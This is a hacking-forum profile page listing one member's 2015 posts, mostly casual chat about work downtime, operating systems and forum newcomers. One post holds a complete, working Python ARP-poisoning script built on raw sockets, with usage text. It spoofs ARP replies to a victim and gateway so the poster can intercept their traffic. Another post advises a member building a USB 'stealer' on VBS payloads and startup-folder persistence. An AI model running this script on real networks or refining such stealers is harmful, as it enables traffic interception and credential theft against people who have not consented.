Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - techb

Pages: 1 [2] 3 4 ... 133
16
Programming newbies / Re: Starting programming?
« on: June 11, 2015, 08:13:03 am »
8 or 9 hours of downtime? I don't know how long people work a day in your country, but thats the ENTIRE day where I'm from. If you have that much down time every day, you're being paid to do nothing.

And reading pydocs, man pages, rfc's, etc is a far cry from reddit and youtube. Learning is one thing. Wasting your life on youtube and reddit is another.

I work 12 hour shifts for 3 days, the 4th day is a 6 hour so I get 42 hours a week. I technically get paid to drive around a mountain in a company truck and make sure nothing is on fire or stolen. Which, sometimes I do have to do things pending on what is going on. Like helping people with broken down cars of ATVs, running bears out of dumpsters and away from the workers, making sure shaft fans are running else the miners would suffocate underground. I've also been shot at from pill heads trying to steal copper. BUT, most of the time 'aint shit going on so hence all the down time.

I do reddit, but offline. There are plenty of subreddits for learning. Like TIL, news, world news, AMA's, and just the comments in general. I also dick off too, like watch movies and browse 9gag offline, youtube vids I download before hand and stuff. But the majority is docs and learning, cause it's what I like doing.

The life of a security officer ;-) paid to do literally almost nothing for more than minimum wage. That's why I've been on irc while I'm "working" if you ever notice I'm on for about 8 hours lmfao

Also techb, the problem I have is I can't just read docs on my phone, I need to be messing with it. Say I'm watching a udemy class, I can't just watch and retain I need to practice and move around in Android Studio. Also when im reading I find it hard to not try any of the code. How can you do that?

SL4A. Since I code in Python and do almost everything with Python I can test most stuff out. The stuff I can't test, like that requires root or internet or some lib that uses ctypes or something wont work, but I write the script anyway and test stuff that will work. Then, when I get home I can run and debug and shit. Makes it easier since at home I'm editing code instead of writing it all by scratch.

17
Programming newbies / Re: Starting programming?
« on: June 11, 2015, 07:03:42 am »
Just because I'm browsing youtube or reddit, does not mean I'm not learning anything.
I'd rather be getting paid to learn, than paid to work.

Agreed. At my job I have around 8 to 9 hours of down time on may hands. Which is spent mostly reading RFC docs, other docs  for python libs, linux man pages, etc...

18
Members introduction / Re: Hey Hoody here
« on: June 07, 2015, 05:10:41 am »
HTML and CSS is not a programming language. It is a markup language only used to make things look pretty.

You should start learning Javascript and PHP if you want to continue with the web stuff. With possible Python, Ruby, Pearl or anything scripting.

19
Operating System / Re: OS X ?
« on: June 07, 2015, 05:07:43 am »
Apple is bashed pretty hard around here for good reasons. Top most because of crazy markup cost they try and shove down your throat. They seem to toss around the word 'innovation' a lot which is complete crap. Most all of what they use is stolen, patented, and then used in law suites before the original creator has any idea what is going on. Jobs was a relentless dictator  treating all of his employees like shit, selfish and never donated any profits to anyone. At least gates respects his employees and donates regularly to worth while causes.

There is nothing better or any good about the software other than looking expensive. Most fanboys are entitled douche bags grew up eating off of silver spoons, or too brain dead to think for themselves, which is why they let Apple do that for them. The os isn't compatible with most decent or well used software other than in-house products. Driver support is shit. Even less customizations than what Windows has to offer. Any kinda of 'extras' have to be  Apple products as well. iTunes is just the worst and no other options. Hardware and all of it would be just fine and okay and maybe welcome here, if it wasn't marked up so high and presented as the 'best end all' solution. When even Windows beats the shit out of it in every way and still being proprietary.

Apple is evil, Windows is the lesser evil, with Linux being God in the OS world.

20
General discussion / Re: Your vote counts
« on: June 06, 2015, 07:31:11 am »
Well shit.

21
Web Oriented Programming / Re: Please don't hunt me down and kill me
« on: June 06, 2015, 06:32:00 am »
That has sorted it, thank you Rytiou..

Can I ask though please, with regards to your response (point number three); is there not an easier way to align the text exactly to the middle of the image, without having to manually adjust the margins? i.e left: 50px; top 50px etc.. Not only is this time consuming and code heavy, it is not entirely accurate?

Mugman

Uhhh.. center. Please post this kind of thing on sites that accept it like Stackoverflow or Daniweb. Rytiou was kind on giving you an answer, but this is NOT the site to post such questions. If it is about hackin then sure maybe, but this is simple homework help kinda shit and is not welcome here. There are plenty of sites like daniweb and stackoverflow to help with such things.

Locked because it should just not be in this forum, also locked and not removed since an answer  is given and maybe someone else might see this before posting such questions.

/

23
Hacking and Security / Re: Gmail: New sign-in from...
« on: June 02, 2015, 03:15:41 pm »
i think they should send a sms alert to registered number & a mail to alternative email or recovery email

because a attacker can easily delete the email

I would drop gmail as an email provider if they switched to something like facebook does. Just no.

24
Feedback / Re: The Noob Invasion.
« on: June 02, 2015, 03:08:48 pm »
The noob plague is nothing new. You've only been a member for about a year now. This has been happening since forums or bboards where a thing in general back in the late 80s and early 90s. Just get used to it, it wont go away.

I have noticed though that the influx of member intros are usually concise with beginning and ending school year/semester times. American school year anyway. Sometimes we get influxes in registration and shit where you see like 5 to 10 or more people join right around the same time. You can contribute to friends telling friends about this "cool new hacking site" they just found, or even teachers linking here.

You rarely see me post in such threads anymore. Only when I see some lols I can have or of the such. Hides grow thick with time. I'm not really an oldfag, but I know who my friends are, and I know enough about ez to understand 'n00bz'.

The real thing we need to worry about is the people actually wanting to learn something. We all start somewhere, and this is a great place to start if you can lurk long enough to learn.

25
Members introduction / Re: printf("Hello, evilzone\n")
« on: June 02, 2015, 12:57:40 pm »


As for MitM via ARP poisoning, I just recently posted a tutorial on doing it with python 2 different ways.

Tutorial
https://evilzone.org/tutorials/arp-cache-poisen-via-python/
Raw sockets example
https://evilzone.org/scripting-languages/%28python%29arp-poison-using-raw-sockets/

26
Members introduction / Re: My curiosity of computers brought me here
« on: June 02, 2015, 12:14:10 pm »
Your avatar looks like the Hamburglar from McDonalds grew a beard. I know it is supposed to be the Joker, but when I look at it I want a big mac.

27
Scripting languages / Re: [python]ARP poison using raw sockets
« on: June 01, 2015, 01:46:23 pm »
Bump. I figured it out. I explain it in the original post, the code is working now.

28
Scripting languages / [python]ARP poison using raw sockets
« on: May 31, 2015, 06:35:16 am »
This is a script to poison the ARP table using raw sockets. It requires Linux, and specifically at or greater than Linux 2.0. Windows simply can not do this with this script. This is an example on building packets by hand in binary form and sending to the driver at Layer 2 (network), skipping Layer 3 (ip) all together using PF_PACKET and raw sockets.

=-=-=-EDIT-=-=-=

The code is working now. The reason it wasn't before was because of using .upper() on the mac address conversions.
Code: [Select]
binascii.unhexlify(''.join(vmac.split(':'))).upper()It was applying the upper method to the binary string. I removed it and it is working. With further testing I found out the mac address could use upper case or lower case hex chars, but have converted them to lower case before converting to binary form. Only because I plan on extending the script and want consistency. I/you can make them upper case before the conversion, but with error testing it is easier to read in lower case for me.

Anyway, code is working like a charm now. Usage:
Code: [Select]
[techb@techb_media Python]$ sudo python2 arpraw.py -h
usage: arpraw.py [-h] -vm VICTIMMAC -vi VICTIMIP -tm TARGETMAC -ti TARGETIP
                 [-d DELAY]

ARP poison using raw sockets

optional arguments:
  -h, --help            show this help message and exit
  -vm VICTIMMAC, --victimmac VICTIMMAC
                        Victim MAC address
  -vi VICTIMIP, --victimip VICTIMIP
                        Victim IP address
  -tm TARGETMAC, --targetmac TARGETMAC
                        Target MAC address [gateway]
  -ti TARGETIP, --targetip TARGETIP
                        Target IP address [gateway]
  -d DELAY, --delay DELAY
                        Delay in seconds between sending packets [optional]

Code: Python
  1. #! /usr/bin/python2
  2.  
  3. # ARP poison example using raw packets
  4. #   instead of scapy. Note that this is
  5. #   very noisey. Any half brained admin
  6. #   would notice the arp activity.
  7. # victim == the computer we want to sniff
  8. # target == default gateway (in most cases)
  9. # Written by: techb
  10. # Date: May 28 2015
  11. # Python: Version 2.7
  12. # OS dev on: Arch Linux
  13. # License: None, script is public domain,  but at
  14. #   least credit me if you share this.
  15. # This script is presented 'as is' and the author
  16. #   is not responsible for misuse or errors you may get.
  17.  
  18. import binascii
  19. import socket
  20. import time
  21. import argparse
  22.  
  23. def getInterfaces():
  24.         '''This function is not used here, but if you
  25.            don't know what interface you want to use
  26.            or the name of it. Since I'm on Arch they
  27.            decided it would be a good idea to make simple
  28.            interface names all fuckey '''
  29.         # NEVER import inside a function or method
  30.         # I put it here incase you used the function
  31.         #   to show you need these libs for it.
  32.         import os, re
  33.         raw = os.popen("ip link show").read()
  34.         interface = re.findall(r"\d: \w+:", raw)
  35.         ilist = []
  36.         for i in interface:
  37.                 ilist.append(i[:-1])
  38.         return ilist
  39.        
  40. def getOwnMac(interface):
  41.         '''Uhhhh, gets my own mac address.'''
  42.         fd = open("/sys/class/net/%s/address" % interface , "r")
  43.         mac = fd.read()
  44.         fd.close()
  45.         return mac.strip()
  46.  
  47. def buildPoison(victim, target, mymac):
  48.     '''builds the custom packet used to poison
  49.       the arp cache. Arguments should be tuples
  50.       comtaining the ip and mac. (ip, mac)'''
  51.     vip = victim[0]
  52.     vmac = victim[1].lower()
  53.     tip = target[0]
  54.     tmac = target[1].lower()
  55.  
  56.     # create binary values to be sent on wire
  57.     # the mac addr conversons are very ugly but work =)
  58.     vip = socket.inet_aton(vip)
  59.     vmac = binascii.unhexlify(''.join(vmac.split(':')))
  60.     tip = socket.inet_aton(tip)
  61.     tmac = binascii.unhexlify(''.join(tmac.split(':')))
  62.     mymac = binascii.unhexlify(''.join(mymac.split(':')))
  63.  
  64.     # build ethernet headers
  65.     pcode = '\x08\x06' #ARP code for eth header
  66.     veth = vmac+mymac+pcode
  67.     teth = tmac+mymac+pcode
  68.  
  69.     # build arp headers
  70.     htype = '\x00\x01' # we're on ethernet
  71.     proto = '\x08\x00' # intended protocol, which is ipv4
  72.     hsize = '\x06' # mac addr size
  73.     psize = '\x04' # ip addr size
  74.     opcode = '\x00\x02' # arp option code, 2 is reply
  75.     arp = htype+proto+hsize+psize+opcode
  76.  
  77.     # build spoofed portion of arp header
  78.     vspoof = mymac+tip+vmac+vip # victim
  79.     tspoof = mymac+vip+tmac+tip # target
  80.  
  81.     # build final packets
  82.     vpacket = veth+arp+vspoof
  83.     tpacket = teth+arp+tspoof
  84.  
  85.     return (vpacket, tpacket)
  86.  
  87. def main(v_mac, t_mac, delay=2):
  88.     '''Main loop. Can pass a delay argument, defaults to 2 seconds.'''
  89.     interface = 'enp2s0' #yours will probably be diff
  90.     my_mac = getOwnMac(interface)
  91.     s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
  92.     s.bind((interface, socket.htons(0x0800)))
  93.     packets = buildPoison(v_mac, t_mac, my_mac)
  94.     print "Poisoning..."
  95.     while True:
  96.         s.send(packets[0])
  97.         s.send(packets[1])
  98.         time.sleep(delay)
  99.  
  100. if __name__ == '__main__':
  101.     ap = argparse.ArgumentParser(description="ARP poison using raw sockets")
  102.     ap.add_argument("-vm", "--victimmac", help="Victim MAC address", required=True)
  103.     ap.add_argument("-vi", "--victimip", help="Victim IP address", required=True)
  104.     ap.add_argument("-tm", "--targetmac", help="Target MAC address [gateway]", required=True)
  105.     ap.add_argument("-ti", "--targetip", help="Target IP address [gateway]", required=True)
  106.     ap.add_argument("-d", "--delay", help="Delay in seconds between sending packets [optional]", type=float)
  107.     args = ap.parse_args()
  108.    
  109.     if args.delay:
  110.         main((args.victimip, args.victimmac), (args.targetip, args.targetmac), delay=args.delay)
  111.     else:
  112.         main((args.victimip, args.victimmac), (args.targetip, args.targetmac))
  113.  

29
Scripting languages / Re: [DUCKY] DeepCopy Ducky Stealer v1.0 (WIP)
« on: May 31, 2015, 06:05:31 am »
Honestly, I think going the vbs route would be better all around. More flexibility and could have it put it in the startup folder. Or just write your own code and compile it and just have the ducky copy it over and run it. The ducky script would still be useful to cd into a temp dir and go from there. Have your own code do the heavy lifting.

30
Hacking and Security / Re: Is hacking a mentality or skillset?
« on: May 29, 2015, 01:57:07 pm »
Oh for fuck sake really? Has this question not been answered not a couple of weeks ago on this forum? Let alone the Internet constantly?
[snip]

Welcome to the internet.

Pages: 1 [2] 3 4 ... 133


Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.